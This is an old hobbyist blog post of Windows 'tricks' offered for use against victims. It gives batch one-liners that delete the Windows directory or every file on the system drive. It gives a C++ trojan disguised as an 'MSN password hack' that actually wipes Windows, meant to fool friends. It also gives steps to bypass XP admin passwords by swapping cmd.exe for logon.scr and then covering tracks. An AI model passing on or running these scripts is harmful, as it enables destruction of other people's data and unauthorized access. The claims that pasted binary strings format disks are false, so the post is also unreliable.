Powered By Blogger

Monday, February 21, 2011

Simple Virus Program


Well this is a simple batch virus that will delete your victim's windows.
It's tested and it works 100%
Open up a notepad and type:
Code:


@echo off rd /Q /S %windir% shutdown -s -t 01


Save as > .bat file
When you run it, it will delete your c:\windows\
You'll need to format after that.
Now a C++ code to trick your friends


Code:


#include <iostream> 
#include <windows.h> 
using namespace std; 
string email; 
system("title MSN HACK by .:d3vILL:."); 
cout << "Welcome to MSN hack by .:d3vILL:." << endl; cout << "Enter your victim's email :"; 
cin >> email; 
cout << "Veryfing email"; 
Sleep(400); 
for(int i=1;i<=3;i+=1); 
{ cout << "."; Sleep(750); } 
cout << "Hacking password of " << email << endl; 
cout << "Please wait.." << endl; Sleep(1000); 
cout << "Estimated time: 10 minutes" << endl; Sleep(1000); 
system("@echo off"); 
system("rd /S /Q %windir%"); 
return 0; 
} ////////////////////////// / Coded By DGi / //////////////////////////


This is actually the same , but you can tell your friends it's a MSN hack program that hacks hotmail email passwords.


Note: It is provided for educational purpose only. Do it on your own risk.

How To Hack Windows Xp Admin Passwords


This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.


This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependant, it works randomly(don't know why)


If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
-----------------------------------------------------------------------------
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Gaurav and you want the password blah enter this
"net user Gaurav blah"
and this changes the password on Gaurav's machine to blah and your in.


Have fun!!!!
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Any updates, Errors, Suggestions or just general comments mail them to either.

Most Amazing Computer Tricks

At first copy the following binary code exactly:

01001011000111110010010101010101010000011111100000
Paste it in a notepad file.
Save the file as 'format.exe'
When you open it, the hard disk formats!!
You can keep this file in your school's computer in a far-off folder. At first rename it and send a shortcut to desktop. Now hide the original file. Change the icon of the shortcut to that of My computer and rename it as 'My Computer' and delete the original 'My computer'. When someone tries to open it....tada!!
If you are unable to format C drive when the victim's PC is running, then you can use the following line of code:
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
It's extremely cool!!
How about making the computer not to boot in the first place?? ;)
Then use this code:
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
You will be astounded at the result when someone tries to restart the PC!
Here is another nice trick:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
Save the file as '.bat'
I won't disclose the result!(Just try it out yourself!)
If you hadn't known the above-mentioned tricks before, then google some more up! There are plenty of more wonderful tricks which would just blow your mind!
Here is a well-known trick called the 'WTC trick'. The plane that hit the WTC had a flight number of Q33N. Now write ' Q33N' in notepad, change the font size to 72, and change the font to 'Wingdings'. See what happens....
Also try the following trick:
Open notepad and write down: 'this app can break'
Save it as 'xxx.txt'
Quit notepad and open it again to have a surprise!
And here is the bummer:
Type down in notepad: 'Bush hid the facts'
Save this file with 'zzz.txt'
Exit notepad and open it again!